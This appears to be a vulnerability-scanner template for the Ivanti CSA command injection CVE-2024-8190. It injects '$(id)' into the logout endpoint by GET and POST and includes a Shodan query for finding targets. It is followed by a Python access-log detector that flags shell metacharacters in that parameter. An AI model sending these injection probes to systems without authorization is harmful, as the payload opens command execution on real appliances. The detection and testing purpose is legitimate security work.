CVE-2024-8190 (Ivanti Command Injection)

Detect potentially vulnerable hosts using the Ivanti-CSA-Detect template

id: CVE-2024-8190

info:
  name: Ivanti CSA Command Injection (CVE-2024-8190)
  author: Redflare-Cyber
  severity: critical
  description: Detects the unauthenticated command injection vulnerability in Ivanti CSA (CVE-2024-8190) by probing the logout endpoint with both GET and POST requests.
  classification:
    cwe-id: CWE-78
  metadata:
    shodan-query: http.html:'Ivanti(R) Cloud Services Appliance'
  reference:
    - https://www.horizon3.ai/attack-research/cisa-kev-cve-2024-8190-ivanti-csa-command-injection/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8190
    - https://github.com/horizon3ai/CVE-2024-8190
  tags: cve, rce, command-injection, ivanti, csa

http:
  # First request using GET method
  - method: GET
    path:
      - "{{BaseURL}}/auth/logout?id=$(id)"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    matchers:
      - type: regex
        regex:
          - 'uid=\d+'
        part: body
    # Stop execution if the vulnerability is found using GET
    stop-at-first-match: true

  # Second request using POST method
  - method: POST
    path:
      - "{{BaseURL}}/auth/logout"
    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    body: "id=$(id)"
    matchers:
      - type: regex
        regex:
          - 'uid=\d+'
        part: body
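A defender-side complement to the template above, added here and not part of the Redflare-Cyber template or of any Ivanti code: it scans web-server access-log lines for GET requests to the /auth/logout endpoint whose id parameter carries shell metacharacters (the same $(id) probe the template sends, raw or URL-encoded). The combined log format, the IP addresses and the SHELL_META_RE character set are assumptions, and the sample lines are constructed, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2024:10:01:02 +0000] "GET /auth/logout?id=%24%28id%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Sep/2024:10:01:03 +0000] "GET /auth/logout?id=$(id) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Sep/2024:10:02:00 +0000] "GET /auth/logout?id=42 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Sep/2024:10:02:05 +0000] "POST /auth/logout HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Assumed combined log format: client, ident, user, [timestamp], "METHOD target proto", status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters that a legitimate logout "id" value should never contain (assumed set).
SHELL_META_RE = re.compile(r'[$`;|&]')
VULN_PATH = "/auth/logout"


def suspicious_params(target):
    """Return {param: decoded_value} for query parameters carrying shell metacharacters."""
    hits = {}
    # parse_qs already URL-decodes once; a second unquote catches double-encoded payloads.
    for key, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)
            if SHELL_META_RE.search(decoded):
                hits[key] = decoded
    return hits


def scan_access_log(text):
    """Return (ip, method, target, hits) for each request to the logout endpoint with a suspicious query."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or urlsplit(m.group("target")).path != VULN_PATH:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            alerts.append((m.group("ip"), m.group("method"), m.group("target"), hits))
    return alerts


if __name__ == "__main__":
    for ip, method, target, hits in scan_access_log(SAMPLE_LOG):
        print(f"ALERT {ip} {method} {target} -> {hits}")
```

POST bodies (the template's second request) do not appear in access logs, so this check only covers the GET variant; body-level inspection needs WAF or request-body logging in front of the appliance.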
